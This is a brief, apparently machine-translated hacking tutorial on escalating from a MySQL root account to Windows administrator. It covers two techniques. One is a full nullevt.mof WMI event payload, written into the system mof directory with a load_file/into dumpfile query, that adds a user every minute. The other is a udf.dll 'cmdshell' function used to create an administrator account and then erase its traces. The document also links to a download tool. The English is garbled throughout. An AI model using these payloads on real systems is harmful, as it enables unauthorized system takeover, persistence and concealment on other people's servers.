MOF

principle

Take advantage of Windows Next c:/windows/system32/wbem/mof/ In the catalog nullevt.mof file , A feature that executes at a specific time every minute .

Claim for raising rights

1. The target system is Windows(Win2000,XP,Win2003);
2. If mysql The version is greater than 5.1,udf.dll The file must be placed in mysql Installation directory lib\plugin Under the folder
notes ：
The directory does not exist by default , This requires us to use webshell find MYSQL Installation directory , And create it in the installation directory lib\plugin Folder , And then udf.dll Export the file to the directory .
3. If mysql Version less than 5.1, udf.dll The file in windows server 2003 Drop on c:\windows\system32 Catalog , stay windows server 2000 Place under c:\winnt\system32 Catalog .
4. master mysql Database account , Need to be root jurisdiction .

step

1、 open c:/windows/system32/wbem/mof/
2、 Put the following code nullevt.mof file

#pragma namespace("\\.\root\subscription")
instance of __EventFilter as $EventFilter
{
    
EventNamespace = "Root\\Cimv2";
Name  = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};

instance of __FilterToConsumerBinding
{
    
Consumer   = $Consumer;
Filter = $EventFilter;
};

3、 Find a writable directory , Upload or create mof file
The format is as follows ：

select load_file('C:\\www\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

Note that there C:\www\nullevt.mof You uploaded it mof Arbitrary path of file , But the path behind is fixed
The system will always run this code after importing .

UDF

principle

UDF To raise rights is to use MYSQL Custom function function function of , take MYSQL Account number into system system jurisdiction

step

1、 take dll The file is imported into the corresponding directory , If an import error occurs can`t open shared library error
2、 Create a custom function

create function cmdshell returns string soname 'udf.dll';
select cmdshell('net user miao zjicmisa.org /add');
select cmdshell('net localgroup administrators miao /add');
drop function cmdshell;  Delete function 
delete from mysql.func where name='cmdshell'   Delete function 

 I'll use mysqlmysql The full version of Tongsha tiquan tool , You can find https://download.csdn.net/download/weixin_53549425/21345256?spm=1001.2014.3001.5501